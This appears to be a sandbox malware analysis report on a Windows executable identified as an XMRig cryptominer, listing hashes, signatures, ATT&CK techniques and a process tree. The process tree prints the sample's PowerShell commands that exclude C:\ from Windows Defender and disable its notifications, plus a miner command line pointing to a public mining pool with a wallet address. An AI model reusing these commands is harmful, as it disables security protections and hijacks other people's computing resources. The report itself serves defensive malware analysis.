Overview

overview

10

Static

static

a024795c16...3d.exe

windows7_x64

6

a024795c16...3d.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    20-10-2021 06:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a024795c1658919d6d486d5b5ec3cf3d.exe

  • Size

    79KB

  • MD5

    a024795c1658919d6d486d5b5ec3cf3d

  • SHA1

    43252185f8b73d64cd398010bca860ec1ac94b52

  • SHA256

    6c37eeda0f1f8b8a33b982e32864e819a2f493fba1615cbca2724264de8ca340

  • SHA512

    4dc88c03e5f382189c1e05ecf2361a6606c21a3ab3ce4397b2c8cd272899bdb0d7a8a638dc64a681b36d39ec819dfaf405c0d1bc64622684673eaa3f11fee0ae

Score
10/10
xmrigminerpersistence

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a024795c1658919d6d486d5b5ec3cf3d.exe
    "C:\Users\Admin\AppData\Local\Temp\a024795c1658919d6d486d5b5ec3cf3d.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Add-MpPreference -ExclusionPath C:\
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-MpPreference -PUAProtection 1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' -Name DisableNotifications -Value 1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1096
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --algo rx/0 --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 49ZMf9zqpebBFbM1oeZChGHGhcuvZReqAiy1n9fq4FcbJeYv3FbGYwfUqsTM7p3CYCN7grTf3PYeYJh5y6YGpK879aJ5Xw8.INTELRIG11 Private-LIMON
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:6348

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    8592ba100a78835a6b94d5949e13dfc1

    SHA1

    63e901200ab9a57c7dd4c078d7f75dcd3b357020

    SHA256

    fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

    SHA512

    87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    dd4efe388365155cf1ce304118643efe

    SHA1

    c1eaf27888cbfbf6b38224e81a7e16bc601b4673

    SHA256

    258651dcc6c61e5de5adfcc06e8064aa647dff6f192aaadde432a07023a82f46

    SHA512

    eadb32e720d7fd4e81f22f4d6d0997104b8e0539af9952d1269ae9c89ff3ae0a481b00190c895f37f89909d984e72b5c7e232ee183db8ddcd535ceaffb0d479b

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    1d3a0e2432d55954eb514220ad9a8ee6

    SHA1

    c122c6175c02df913ec265749eb38840437f7ecc

    SHA256

    10ba0ec37dee931ea987962d0ef3b6f54406a9c95aa8b780327d9e1345af8235

    SHA512

    ed5849d09ec2e7bee688a0ae2cd724c2973e4d6d53b9483d094988eed10afb2afadc0e3e8dccf030299abe4164eefb4052858cfa8bc5824406877615e2b5fdcf

    Download Submit
  • memory/1096-218-0x00000221427D8000-0x00000221427D9000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1096-217-0x00000221427D6000-0x00000221427D8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1096-204-0x00000221427D3000-0x00000221427D5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1096-203-0x00000221427D0000-0x00000221427D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1096-194-0x0000000000000000-mapping.dmp
    Download
  • memory/1676-115-0x00000000009A0000-0x00000000009A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1676-220-0x000000001C4A0000-0x000000001C4A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-127-0x0000022A73E70000-0x0000022A73E71000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2684-119-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-128-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-130-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-131-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-149-0x0000022A5B736000-0x0000022A5B738000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-154-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-117-0x0000000000000000-mapping.dmp
    Download
  • memory/2684-118-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-126-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-125-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-120-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-121-0x0000022A59C70000-0x0000022A59C72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-123-0x0000022A5B730000-0x0000022A5B732000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-122-0x0000022A5B6F0000-0x0000022A5B6F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2684-124-0x0000022A5B733000-0x0000022A5B735000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2684-169-0x0000022A5B738000-0x0000022A5B739000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2844-159-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-157-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-171-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-172-0x00000228782D0000-0x000002287841A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2844-170-0x00000228782D0000-0x000002287841A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2844-174-0x00000228782D0000-0x000002287841A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2844-164-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-168-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-201-0x00000228782D0000-0x000002287841A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2844-160-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-163-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-158-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2844-155-0x0000000000000000-mapping.dmp
    Download
  • memory/2844-166-0x0000022878160000-0x0000022878162000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2988-221-0x0000000140000000-mapping.dmp
    Download
  • memory/2988-224-0x0000024F67B10000-0x0000024F67B12000-memory.dmp
    Filesize

    8KB

    Download
  • memory/6348-227-0x00000000004014F0-mapping.dmp
    Download
  • memory/6348-232-0x0000000000400000-0x0000000000E3A000-memory.dmp
    Filesize

    10.2MB

    Download
  • memory/6348-234-0x00000178808E0000-0x0000017880900000-memory.dmp
    Filesize

    128KB

    Download
  • memory/6348-235-0x00000178821C0000-0x00000178821E0000-memory.dmp
    Filesize

    128KB

    Download